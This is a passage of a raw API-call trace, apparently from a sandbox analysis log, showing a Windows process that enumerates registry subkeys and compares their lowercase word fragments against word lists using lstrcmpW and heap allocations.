[0102.368] lstrcmpW (lpString1="device", lpString2="launch") returned -1 [0102.368] lstrcmpW (lpString1="common", lpString2="launch") returned -1 [0102.368] lstrcmpW (lpString1="update", lpString2="launch") returned 1 [0102.368] lstrcmpW (lpString1="events", lpString2="launch") returned -1 [0102.368] RegEnumKeyW (in: hKey=0x260, dwIndex=0x1b, lpName=0x19fd50, cchName=0x104 | out: lpName="EAS") returned 0x0 [0102.368] lstrlenW (lpString="EAS") returned 3 [0102.368] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x14) returned 0x6fb710 [0102.368] lstrcmpW (lpString1="app", lpString2="eas") returned -1 [0102.368] lstrcmpW (lpString1="bit", lpString2="eas") returned -1 [0102.368] lstrcmpW (lpString1="cmf", lpString2="eas") returned -1 [0102.368] lstrcmpW (lpString1="com", lpString2="eas") returned -1 [0102.368] lstrcmpW (lpString1="dev", lpString2="eas") returned -1 [0102.368] lstrcmpW (lpString1="dma", lpString2="eas") returned -1 [0102.368] RegEnumKeyW (in: hKey=0x260, dwIndex=0x1c, lpName=0x19fd50, cchName=0x104 | out: lpName="Els") returned 0x0 [0102.368] lstrlenW (lpString="Els") returned 3 [0102.368] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x14) returned 0x6fb490 [0102.368] lstrcmpW (lpString1="app", lpString2="els") returned -1 [0102.368] lstrcmpW (lpString1="bit", lpString2="els") returned -1 [0102.368] lstrcmpW (lpString1="cmf", lpString2="els") returned -1 [0102.368] lstrcmpW (lpString1="com", lpString2="els") returned -1 [0102.368] lstrcmpW (lpString1="dev", lpString2="els") returned -1 [0102.368] lstrcmpW (lpString1="dma", lpString2="els") returned -1 [0102.368] lstrcmpW (lpString1="eas", lpString2="els") returned -1 [0102.368] RegEnumKeyW (in: hKey=0x260, dwIndex=0x1d, lpName=0x19fd50, cchName=0x104 | out: lpName="Errata") returned 0x0 [0102.369] lstrlenW (lpString="Errata") returned 6 [0102.369] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x1a) returned 0x6fc188 [0102.370] lstrcmpW (lpString1="backup", lpString2="errata") returned -1 [0102.370] lstrcmpW (lpString1="locker", lpString2="errata") returned 1 [0102.370] lstrcmpW (lpString1="device", lpString2="errata") returned -1 [0102.370] lstrcmpW (lpString1="common", lpString2="errata") returned -1 [0102.370] lstrcmpW (lpString1="update", lpString2="errata") returned 1 [0102.370] lstrcmpW (lpString1="events", lpString2="errata") returned 1 [0102.370] lstrcmpW (lpString1="launch", lpString2="errata") returned 1 [0102.370] RegEnumKeyW (in: hKey=0x260, dwIndex=0x1e, lpName=0x19fd50, cchName=0x104 | out: lpName="FileSystem") returned 0x0 [0102.370] lstrlenW (lpString="FileSystem") returned 10 [0102.370] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x16) returned 0x6fb450 [0102.370] lstrcmpW (lpString1="acpi", lpString2="file") returned -1 [0102.370] lstrcmpW (lpString1="name", lpString2="file") returned 1 [0102.370] lstrcmpW (lpString1="glob", lpString2="file") returned 1 [0102.370] lstrcmpW (lpString1="user", lpString2="file") returned 1 [0102.370] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x1a) returned 0x6fc1b0 [0102.370] lstrcmpW (lpString1="backup", lpString2="system") returned -1 [0102.370] lstrcmpW (lpString1="locker", lpString2="system") returned -1 [0102.370] lstrcmpW (lpString1="device", lpString2="system") returned -1 [0102.370] lstrcmpW (lpString1="common", lpString2="system") returned -1 [0102.370] lstrcmpW (lpString1="update", lpString2="system") returned 1 [0102.370] lstrcmpW (lpString1="events", lpString2="system") returned -1 [0102.370] lstrcmpW (lpString1="launch", lpString2="system") returned -1 [0102.370] lstrcmpW (lpString1="errata", lpString2="system") returned -1 [0102.370] RegEnumKeyW (in: hKey=0x260, dwIndex=0x1f, lpName=0x19fd50, cchName=0x104 | out: lpName="FileSystemUtilities") returned 0x0 [0102.371] lstrlenW (lpString="FileSystemUtilities") returned 19 [0102.371] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x16) returned 0x71a360 [0102.371] lstrcmpW (lpString1="acpi", lpString2="file") returned -1 [0102.371] lstrcmpW (lpString1="name", lpString2="file") returned 1 [0102.371] lstrcmpW (lpString1="glob", lpString2="file") returned 1 [0102.371] lstrcmpW (lpString1="user", lpString2="file") returned 1 [0102.371] lstrcmpW (lpString1="file", lpString2="file") returned 0 [0102.371] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x71a360 | out: hHeap=0x6f0000) returned 1 [0102.371] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x1a) returned 0x6fc2c8 [0102.371] lstrcmpW (lpString1="backup", lpString2="system") returned -1 [0102.372] lstrcmpW (lpString1="locker", lpString2="system") returned -1 [0102.372] lstrcmpW (lpString1="device", lpString2="system") returned -1 [0102.372] lstrcmpW (lpString1="common", lpString2="system") returned -1 [0102.372] lstrcmpW (lpString1="update", lpString2="system") returned 1 [0102.372] lstrcmpW (lpString1="events", lpString2="system") returned -1 [0102.372] lstrcmpW (lpString1="launch", lpString2="system") returned -1 [0102.372] lstrcmpW (lpString1="errata", lpString2="system") returned -1 [0102.372] lstrcmpW (lpString1="system", lpString2="system") returned 0 [0102.372] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x6fc2c8 | out: hHeap=0x6f0000) returned 1 [0102.372] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x20) returned 0x6fc340 [0102.372] lstrcmpW (lpString1="readiness", lpString2="utilities") returned -1 [0102.372] lstrcmpW (lpString1="container", lpString2="utilities") returned -1 [0102.372] lstrcmpW (lpString1="migration", lpString2="utilities") returned -1 [0102.372] lstrcmpW (lpString1="overrides", lpString2="utilities") returned -1 [0102.372] RegEnumKeyW (in: hKey=0x260, dwIndex=0x20, lpName=0x19fd50, cchName=0x104 | out: lpName="GraphicsDrivers") returned 0x0 [0102.372] lstrlenW (lpString="GraphicsDrivers") returned 15 [0102.372] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x1e) returned 0x6fc1d8 [0102.372] lstrcmpW (lpString1="arbiters", lpString2="graphics") returned -1 [0102.372] lstrcmpW (lpString1="settings", lpString2="graphics") returned 1 [0102.372] lstrcmpW (lpString1="computer", lpString2="graphics") returned -1 [0102.372] lstrcmpW (lpString1="property", lpString2="graphics") returned 1 [0102.372] lstrcmpW (lpString1="security", lpString2="graphics") returned 1 [0102.372] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x1c) returned 0x6fc368 [0102.372] lstrcmpW (lpString1="restore", lpString2="drivers") returned 1 [0102.372] lstrcmpW (lpString1="arbiter", lpString2="drivers") returned -1 [0102.372] lstrcmpW (lpString1="content", lpString2="drivers") returned -1 [0102.373] lstrcmpW (lpString1="control", lpString2="drivers") returned -1 [0102.373] lstrcmpW (lpString1="classes", lpString2="drivers") returned -1 [0102.373] RegEnumKeyW (in: hKey=0x260, dwIndex=0x21, lpName=0x19fd50, cchName=0x104 | out: lpName="GroupOrderList") returned 0x0 [0102.373] lstrlenW (lpString="GroupOrderList") returned 14 [0102.373] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x18) returned 0x71a3a0 [0102.373] lstrcmpW (lpString1="class", lpString2="group") returned -1 [0102.373] lstrcmpW (lpString1="index", lpString2="group") returned 1 [0102.373] lstrcmpW (lpString1="crash", lpString2="group") returned -1 [0102.373] lstrcmpW (lpString1="guard", lpString2="group") returned 1 [0102.373] lstrcmpW (lpString1="query", lpString2="group") returned 1 [0102.373] lstrcmpW (lpString1="early", lpString2="group") returned -1 [0102.373] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x18) returned 0x71a260 [0102.373] lstrcmpW (lpString1="class", lpString2="order") returned -1 [0102.373] lstrcmpW (lpString1="index", lpString2="order") returned -1 [0102.373] lstrcmpW (lpString1="crash", lpString2="order") returned -1 [0102.373] lstrcmpW (lpString1="guard", lpString2="order") returned -1 [0102.373] lstrcmpW (lpString1="query", lpString2="order") returned 1 [0102.373] lstrcmpW (lpString1="early", lpString2="order") returned -1 [0102.373] lstrcmpW (lpString1="group", lpString2="order") returned -1 [0102.373] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x16) returned 0x71a200 [0102.373] lstrcmpW (lpString1="acpi", lpString2="list") returned -1 [0102.373] lstrcmpW (lpString1="name", lpString2="list") returned 1 [0102.373] lstrcmpW (lpString1="glob", lpString2="list") returned -1 [0102.373] lstrcmpW (lpString1="user", lpString2="list") returned 1 [0102.373] lstrcmpW (lpString1="file", lpString2="list") returned -1 [0102.373] RegEnumKeyW (in: hKey=0x260, dwIndex=0x22, lpName=0x19fd50, cchName=0x104 | out: lpName="HAL") returned 0x0 [0102.374] lstrlenW (lpString="HAL") returned 3 [0102.374] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x14) returned 0x71a3e0 [0102.374] lstrcmpW (lpString1="app", lpString2="hal") returned -1 [0102.374] lstrcmpW (lpString1="bit", lpString2="hal") returned -1 [0102.374] lstrcmpW (lpString1="cmf", lpString2="hal") returned -1 [0102.374] lstrcmpW (lpString1="com", lpString2="hal") returned -1 [0102.374] lstrcmpW (lpString1="dev", lpString2="hal") returned -1 [0102.374] lstrcmpW (lpString1="dma", lpString2="hal") returned -1 [0102.374] lstrcmpW (lpString1="eas", lpString2="hal") returned -1 [0102.374] lstrcmpW (lpString1="els", lpString2="hal") returned -1 [0102.374] RegEnumKeyW (in: hKey=0x260, dwIndex=0x23, lpName=0x19fd50, cchName=0x104 | out: lpName="IDConfigDB") returned 0x0 [0102.374] lstrlenW (lpString="IDConfigDB") returned 10 [0102.374] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x1e) returned 0x6fc2c8 [0102.374] lstrcmpW (lpString1="arbiters", lpString2="idconfig") returned -1 [0102.374] lstrcmpW (lpString1="settings", lpString2="idconfig") returned 1 [0102.374] lstrcmpW (lpString1="computer", lpString2="idconfig") returned -1 [0102.374] lstrcmpW (lpString1="property", lpString2="idconfig") returned 1 [0102.374] lstrcmpW (lpString1="security", lpString2="idconfig") returned 1 [0102.374] lstrcmpW (lpString1="graphics", lpString2="idconfig") returned -1 [0102.374] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x12) returned 0x71a220 [0102.375] lstrcmpW (lpString1="id", lpString2="db") returned 1 [0102.375] lstrcmpW (lpString1="ci", lpString2="db") returned -1 [0102.375] lstrcmpW (lpString1="co", lpString2="db") returned -1 [0102.375] RegEnumKeyW (in: hKey=0x260, dwIndex=0x24, lpName=0x19fd50, cchName=0x104 | out: lpName="InitialMachineConfig") returned 0x0 [0102.375] lstrlenW (lpString="InitialMachineConfig") returned 20 [0102.375] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x1c) returned 0x71a9f8 [0102.375] lstrcmpW (lpString1="restore", lpString2="initial") returned 1 [0102.375] lstrcmpW (lpString1="arbiter", lpString2="initial") returned -1 [0102.375] lstrcmpW (lpString1="content", lpString2="initial") returned -1 [0102.375] lstrcmpW (lpString1="control", lpString2="initial") returned -1 [0102.375] lstrcmpW (lpString1="classes", lpString2="initial") returned -1 [0102.375] lstrcmpW (lpString1="drivers", lpString2="initial") returned -1 [0102.375] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x1c) returned 0x71aa20 [0102.375] lstrcmpW (lpString1="restore", lpString2="machine") returned 1 [0102.375] lstrcmpW (lpString1="arbiter", lpString2="machine") returned -1 [0102.375] lstrcmpW (lpString1="content", lpString2="machine") returned -1 [0102.375] lstrcmpW (lpString1="control", lpString2="machine") returned -1 [0102.375] lstrcmpW (lpString1="classes", lpString2="machine") returned -1 [0102.376] lstrcmpW (lpString1="drivers", lpString2="machine") returned -1 [0102.376] lstrcmpW (lpString1="initial", lpString2="machine") returned -1 [0102.376] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x1a) returned 0x71abb0 [0102.376] lstrcmpW (lpString1="backup", lpString2="config") returned -1 [0102.376] lstrcmpW (lpString1="locker", lpString2="config") returned 1 [0102.376] lstrcmpW (lpString1="device", lpString2="config") returned 1 [0102.376] lstrcmpW (lpString1="common", lpString2="config") returned -1 [0102.376] lstrcmpW (lpString1="update", lpString2="config") returned 1 [0102.376] lstrcmpW (lpString1="events", lpString2="config") returned 1 [0102.376] lstrcmpW (lpString1="launch", lpString2="config") returned 1 [0102.376] lstrcmpW (lpString1="errata", lpString2="config") returned 1 [0102.376] lstrcmpW (lpString1="system", lpString2="config") returned 1 [0102.376] RegEnumKeyW (in: hKey=0x260, dwIndex=0x25, lpName=0x19fd50, cchName=0x104 | out: lpName="IPMI") returned 0x0 [0102.376] lstrlenW (lpString="IPMI") returned 4 [0102.376] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x16) returned 0x71a1c0 [0102.376] lstrcmpW (lpString1="acpi", lpString2="ipmi") returned -1 [0102.376] lstrcmpW (lpString1="name", lpString2="ipmi") returned 1 [0102.376] lstrcmpW (lpString1="glob", lpString2="ipmi") returned -1 [0102.376] lstrcmpW (lpString1="user", lpString2="ipmi") returned 1 [0102.376] lstrcmpW (lpString1="file", lpString2="ipmi") returned -1 [0102.376] lstrcmpW (lpString1="list", lpString2="ipmi") returned 1 [0102.377] RegEnumKeyW (in: hKey=0x260, dwIndex=0x26, lpName=0x19fd50, cchName=0x104 | out: lpName="Keyboard Layout") returned 0x0 [0102.377] lstrlenW (lpString="Keyboard Layout") returned 15 [0102.377] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x1e) returned 0x71aa48 [0102.377] lstrcmpW (lpString1="arbiters", lpString2="keyboard") returned -1 [0102.377] lstrcmpW (lpString1="settings", lpString2="keyboard") returned 1 [0102.377] lstrcmpW (lpString1="computer", lpString2="keyboard") returned -1 [0102.377] lstrcmpW (lpString1="property", lpString2="keyboard") returned 1 [0102.377] lstrcmpW (lpString1="security", lpString2="keyboard") returned 1 [0102.377] lstrcmpW (lpString1="graphics", lpString2="keyboard") returned -1 [0102.377] lstrcmpW (lpString1="idconfig", lpString2="keyboard") returned -1 [0102.377] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x1a) returned 0x71ac28 [0102.377] lstrcmpW (lpString1="backup", lpString2="layout") returned -1 [0102.377] lstrcmpW (lpString1="locker", lpString2="layout") returned 1 [0102.377] lstrcmpW (lpString1="device", lpString2="layout") returned -1 [0102.377] lstrcmpW (lpString1="common", lpString2="layout") returned -1 [0102.377] lstrcmpW (lpString1="update", lpString2="layout") returned 1 [0102.377] lstrcmpW (lpString1="events", lpString2="layout") returned -1 [0102.377] lstrcmpW (lpString1="launch", lpString2="layout") returned -1 [0102.377] lstrcmpW (lpString1="errata", lpString2="layout") returned -1 [0102.377] lstrcmpW (lpString1="system", lpString2="layout") returned 1 [0102.377] lstrcmpW (lpString1="config", lpString2="layout") returned -1 [0102.377] RegEnumKeyW (in: hKey=0x260, dwIndex=0x27, lpName=0x19fd50, cchName=0x104 | out: lpName="Keyboard Layouts") returned 0x0 [0102.377] lstrlenW (lpString="Keyboard Layouts") returned 16 [0102.377] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x1e) returned 0x71aac0 [0102.377] lstrcmpW (lpString1="arbiters", lpString2="keyboard") returned -1 [0102.378] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x71aac0 | out: hHeap=0x6f0000) returned 1 [0102.378] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x1c) returned 0x71aae8 [0102.378] RegEnumKeyW (in: hKey=0x260, dwIndex=0x28, lpName=0x19fd50, cchName=0x104 | out: lpName="Lsa") returned 0x0 [0102.378] lstrlenW (lpString="Lsa") returned 3 [0102.378] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x14) returned 0x71a240 [0102.378] RegEnumKeyW (in: hKey=0x260, dwIndex=0x29, lpName=0x19fd50, cchName=0x104 | out: lpName="LsaExtensionConfig") returned 0x0 [0102.378] lstrlenW (lpString="LsaExtensionConfig") returned 18 [0102.378] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x14) returned 0x71a2a0 [0102.378] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x71a2a0 | out: hHeap=0x6f0000) returned 1 [0102.378] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x20) returned 0x71ab10 [0102.378] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x1a) returned 0x71ac50 [0102.378] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x71ac50 | out: hHeap=0x6f0000) returned 1 [0102.378] RegEnumKeyW (in: hKey=0x260, dwIndex=0x2a, lpName=0x19fd50, cchName=0x104 | out: lpName="LsaInformation") returned 0x0 [0102.378] lstrlenW (lpString="LsaInformation") returned 14 [0102.378] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x14) returned 0x71a0c0 [0102.378] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x71a0c0 | out: hHeap=0x6f0000) returned 1 [0102.378] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x24) returned 0x708b90 [0102.379] RegEnumKeyW (in: hKey=0x260, dwIndex=0x2b, lpName=0x19fd50, cchName=0x104 | out: lpName="ManufacturingMode") returned 0x0 [0102.379] lstrlenW (lpString="ManufacturingMode") returned 17 [0102.379] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x28) returned 0x708bc0 [0102.379] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x16) returned 0x71a280 [0102.379] RegEnumKeyW (in: hKey=0x260, dwIndex=0x2c, lpName=0x19fd50, cchName=0x104 | out: lpName="MediaCategories") returned 0x0 [0102.379] lstrlenW (lpString="MediaCategories") returned 15 [0102.379] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x18) returned 0x71a2a0 [0102.379] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x22) returned 0x708bf0 [0102.379] RegEnumKeyW (in: hKey=0x260, dwIndex=0x2d, lpName=0x19fd50, cchName=0x104 | out: lpName="MediaInterfaces") returned 0x0 [0102.379] lstrlenW (lpString="MediaInterfaces") returned 15 [0102.379] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x18) returned 0x71a2e0 [0102.379] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x71a2e0 | out: hHeap=0x6f0000) returned 1 [0102.379] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x22) returned 0x708c50 [0102.379] RegEnumKeyW (in: hKey=0x260, dwIndex=0x2e, lpName=0x19fd50, cchName=0x104 | out: lpName="MediaProperties") returned 0x0 [0102.379] lstrlenW (lpString="MediaProperties") returned 15 [0102.379] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x18) returned 0x71a2c0 [0102.379] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x71a2c0 | out: hHeap=0x6f0000) returned 1 [0102.379] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x22) returned 0x71b220 [0102.534] RegEnumKeyW (in: hKey=0x260, dwIndex=0x2f, lpName=0x19fd50, cchName=0x104 | out: lpName="MSDTC") returned 0x0 [0102.535] lstrlenW (lpString="MSDTC") returned 5 [0102.535] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x18) returned 0x71a360 [0102.535] RegEnumKeyW (in: hKey=0x260, dwIndex=0x30, lpName=0x19fd50, cchName=0x104 | out: lpName="MUI") returned 0x0 [0102.535] lstrlenW (lpString="MUI") returned 3 [0102.535] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x14) returned 0x71a3c0 [0102.535] RegEnumKeyW (in: hKey=0x260, dwIndex=0x31, lpName=0x19fd50, cchName=0x104 | out: lpName="NetDiagFx") returned 0x0 [0102.535] lstrlenW (lpString="NetDiagFx") returned 9 [0102.535] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x14) returned 0x71a2c0 [0102.535] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x16) returned 0x71a440 [0102.535] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x12) returned 0x71a2e0 [0102.535] RegEnumKeyW (in: hKey=0x260, dwIndex=0x32, lpName=0x19fd50, cchName=0x104 | out: lpName="NetDrivers") returned 0x0 [0102.537] lstrlenW (lpString="NetDrivers") returned 10 [0102.537] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x14) returned 0x71a300 [0102.537] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x71a300 | out: hHeap=0x6f0000) returned 1 [0102.537] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x1c) returned 0x71ab38 [0102.537] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x71ab38 | out: hHeap=0x6f0000) returned 1 [0102.537] RegEnumKeyW (in: hKey=0x260, dwIndex=0x33, lpName=0x19fd50, cchName=0x104 | out: lpName="NetProvision") returned 0x0 [0102.537] lstrlenW (lpString="NetProvision") returned 12 [0102.537] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x14) returned 0x71a1a0 [0102.537] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x71a1a0 | out: hHeap=0x6f0000) returned 1 [0102.537] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x20) returned 0x71ab38 [0102.538] RegEnumKeyW (in: hKey=0x260, dwIndex=0x34, lpName=0x19fd50, cchName=0x104 | out: lpName="NetTrace") returned 0x0 [0102.538] lstrlenW (lpString="NetTrace") returned 8 [0102.538] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x14) returned 0x71a120 [0102.538] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x71a120 | out: hHeap=0x6f0000) returned 1 [0102.538] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x18) returned 0x71a400 [0102.538] RegEnumKeyW (in: hKey=0x260, dwIndex=0x35, lpName=0x19fd50, cchName=0x104 | out: lpName="Network") returned 0x0 [0102.538] lstrlenW (lpString="Network") returned 7 [0102.538] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x1c) returned 0x71ac50 [0102.538] RegEnumKeyW (in: hKey=0x260, dwIndex=0x36, lpName=0x19fd50, cchName=0x104 | out: lpName="NetworkProvider") returned 0x0 [0102.538] lstrlenW (lpString="NetworkProvider") returned 15 [0102.538] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x1c) returned 0x71a9a8 [0102.538] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x71a9a8 | out: hHeap=0x6f0000) returned 1 [0102.538] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x1e) returned 0x71ab60 [0102.538] RegEnumKeyW (in: hKey=0x260, dwIndex=0x37, lpName=0x19fd50, cchName=0x104 | out: lpName="NetworkSetup2") returned 0x0 [0102.539] lstrlenW (lpString="NetworkSetup2") returned 13 [0102.539] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x1c) returned 0x71ab88 [0102.539] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x71ab88 | out: hHeap=0x6f0000) returned 1 [0102.539] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x1a) returned 0x71ab88 [0102.539] RegEnumKeyW (in: hKey=0x260, dwIndex=0x38, lpName=0x19fd50, cchName=0x104 | out: lpName="NetworkUxManager") returned 0x0 [0102.539] lstrlenW (lpString="NetworkUxManager") returned 16 [0102.539] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x1c) returned 0x71aa98 [0102.539] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x71aa98 | out: hHeap=0x6f0000) returned 1 [0102.539] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x12) returned 0x71a0e0 [0102.539] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x1c) returned 0x71a9a8 [0102.539] RegEnumKeyW (in: hKey=0x260, dwIndex=0x39, lpName=0x19fd50, cchName=0x104 | out: lpName="Nls") returned 0x0 [0102.539] lstrlenW (lpString="Nls") returned 3 [0102.539] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x14) returned 0x71a0c0 [0102.539] RegEnumKeyW (in: hKey=0x260, dwIndex=0x3a, lpName=0x19fd50, cchName=0x104 | out: lpName="NodeInterfaces") returned 0x0 [0102.539] lstrlenW (lpString="NodeInterfaces") returned 14 [0102.539] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x16) returned 0x71a140 [0102.540] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x22) returned 0x71b100 [0102.540] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x71b100 | out: hHeap=0x6f0000) returned 1 [0102.540] RegEnumKeyW (in: hKey=0x260, dwIndex=0x3b, lpName=0x19fd50, cchName=0x104 | out: lpName="Notifications") returned 0x0 [0102.540] lstrlenW (lpString="Notifications") returned 13 [0102.540] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x28) returned 0x71b280 [0102.540] RegEnumKeyW (in: hKey=0x260, dwIndex=0x3c, lpName=0x19fd50, cchName=0x104 | out: lpName="Nsi") returned 0x0 [0102.540] lstrlenW (lpString="Nsi") returned 3 [0102.540] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x14) returned 0x71a100 [0102.540] RegEnumKeyW (in: hKey=0x260, dwIndex=0x3d, lpName=0x19fd50, cchName=0x104 | out: lpName="OSExtensionDatabase") returned 0x0 [0102.540] lstrlenW (lpString="OSExtensionDatabase") returned 19 [0102.540] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x24) returned 0x71ae00 [0102.540] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x1e) returned 0x71aac0 [0102.540] RegEnumKeyW (in: hKey=0x260, dwIndex=0x3e, lpName=0x19fd50, cchName=0x104 | out: lpName="PnP") returned 0x0 [0102.541] lstrlenW (lpString="PnP") returned 3 [0102.541] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x12) returned 0x71a0a0 [0102.541] RegEnumKeyW (in: hKey=0x260, dwIndex=0x3f, lpName=0x19fd50, cchName=0x104 | out: lpName="Power") returned 0x0 [0102.541] lstrlenW (lpString="Power") returned 5 [0102.541] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x18) returned 0x71a1a0 [0102.541] RegEnumKeyW (in: hKey=0x260, dwIndex=0x40, lpName=0x19fd50, cchName=0x104 | out: lpName="Print") returned 0x0 [0102.541] lstrlenW (lpString="Print") returned 5 [0102.541] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x18) returned 0x71a160 [0102.541] RegEnumKeyW (in: hKey=0x260, dwIndex=0x41, lpName=0x19fd50, cchName=0x104 | out: lpName="PriorityControl") returned 0x0 [0102.541] lstrlenW (lpString="PriorityControl") returned 15 [0102.541] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x1e) returned 0x71aa70 [0102.541] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x1c) returned 0x71abd8 [0102.541] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x71abd8 | out: hHeap=0x6f0000) returned 1 [0102.542] RegEnumKeyW (in: hKey=0x260, dwIndex=0x42, lpName=0x19fd50, cchName=0x104 | out: lpName="ProductOptions") returned 0x0 [0102.542] lstrlenW (lpString="ProductOptions") returned 14 [0102.542] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x1c) returned 0x71aa98 [0102.542] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x1c) returned 0x71abd8 [0102.542] RegEnumKeyW (in: hKey=0x260, dwIndex=0x43, lpName=0x19fd50, cchName=0x104 | out: lpName="RadioManagement") returned 0x0 [0102.542] lstrlenW (lpString="RadioManagement") returned 15 [0102.542] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x18) returned 0x71a340 [0102.542] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x22) returned 0x71b010 [0102.542] RegEnumKeyW (in: hKey=0x260, dwIndex=0x44, lpName=0x19fd50, cchName=0x104 | out: lpName="Remote Assistance") returned 0x0 [0102.542] lstrlenW (lpString="Remote Assistance") returned 17 [0102.542] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x1a) returned 0x71ac00 [0102.542] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x22) returned 0x71acb0 [0102.542] RegEnumKeyW (in: hKey=0x260, dwIndex=0x45, lpName=0x19fd50, cchName=0x104 | out: lpName="RetailDemo") returned 0x0 [0102.542] lstrlenW (lpString="RetailDemo") returned 10 [0102.542] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x1a) returned 0x71a9d0 [0102.543] 